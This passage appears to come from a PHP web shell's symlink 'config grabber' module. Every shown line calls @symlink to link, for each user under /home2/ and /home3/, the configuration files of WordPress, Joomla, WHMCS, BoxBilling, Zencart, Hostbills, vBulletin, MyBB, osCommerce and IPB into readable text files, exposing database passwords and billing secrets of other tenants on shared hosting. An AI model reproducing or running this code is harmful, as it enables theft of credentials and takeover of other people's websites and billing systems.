  4711. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  4712. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  4713. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  4714. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  4715. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  4716. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  4717. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  4718. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  4719. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  4720. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  4721. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  4722. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  4723. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  4724. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  4725. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  4726. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  4727. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  4728. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  4729. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  4730. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  4731. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4732. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4733. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  4734. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  4735. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  4736. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  4737. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  4738. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  4739. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  4740. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  4741. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  4742. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  4743. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  4744. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  4745. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  4746. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  4747. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  4748. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  4749. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  4750. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  4751. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  4752. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  4753. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  4754. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  4755. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  4756. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  4757. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  4758. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  4759. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  4760. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  4761. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  4762. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  4763. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  4764. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  4765. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  4766. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  4767. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  4768. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  4769. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  4770. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  4771. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  4772. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  4773. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  4774. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  4775. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  4776. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  4777. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  4778. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  4779. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  4780. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  4781. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4782. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4783. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4784. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  4785. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  4786. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  4787. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  4788. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  4789. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  4790. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  4791. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  4792. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  4793. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  4794. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  4795. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  4796. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  4797. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  4798. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  4799. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  4800. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  4801. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  4802. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  4803. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  4804. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  4805. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  4806. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  4807. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  4808. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4809. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4810. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4811. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  4812. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  4813. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  4814. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  4815. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  4816. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  4817. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  4818. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  4819. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  4820. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  4821. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  4822. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  4823. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  4824. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  4825. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  4826. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  4827. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  4828. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  4829. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  4830. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  4831. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  4832. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  4833. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  4834. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  4835. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  4836. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  4837. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  4838. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  4839. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  4840. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  4841. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  4842. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  4843. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  4844. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  4845. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  4846. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  4847. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  4848. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  4849. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  4850. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  4851. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  4852. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  4853. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  4854. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  4855. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  4856. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  4857. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  4858. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  4859. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  4860. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  4861. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  4862.  
  4863. //Home3
  4864.  
  4865. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  4866. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  4867. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  4868. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  4869. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  4870. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  4871. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  4872. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  4873. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  4874. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  4875. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  4876. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  4877. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  4878. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  4879. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  4880. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  4881. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  4882. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  4883. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  4884. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  4885. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  4886. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  4887. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  4888. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  4889. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  4890. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  4891. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  4892. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  4893. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  4894. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  4895. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  4896. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  4897. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  4898. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  4899. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  4900. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  4901. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  4902. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  4903. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  4904. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  4905. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  4906. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  4907. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  4908. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  4909. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  4910. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  4911. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  4912. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  4913. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  4914. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4915. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  4916. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  4917. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  4918. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  4919. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  4920. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  4921. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  4922. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  4923. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  4924. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  4925. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  4926. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  4927. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  4928. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  4929. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  4930. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  4931. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  4932. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  4933. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  4934. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  4935. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  4936. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  4937. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  4938. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  4939. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  4940. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  4941. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  4942. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  4943. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  4944. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  4945. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  4946. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  4947. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  4948. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  4949. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  4950. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  4951. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  4952. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  4953. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  4954. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  4955. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  4956. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  4957. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  4958. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  4959. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  4960. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  4961. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  4962. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  4963. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  4964. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4965. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4966. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4967. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  4968. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  4969. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  4970. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  4971. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  4972. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  4973. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  4974. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  4975. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  4976. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  4977. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  4978. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  4979. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  4980. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  4981. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  4982. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  4983. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  4984. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  4985. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  4986. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  4987. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  4988. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  4989. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  4990. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  4991. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  4992. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  4993. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  4994. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  4995. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  4996. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  4997. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  4998. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  4999. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  5000. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  5001. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  5002. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  5003. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  5004. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  5005. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  5006. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  5007. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  5008. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  5009. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  5010. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  5011. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  5012. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  5013. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  5014. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  5015. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  5016. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
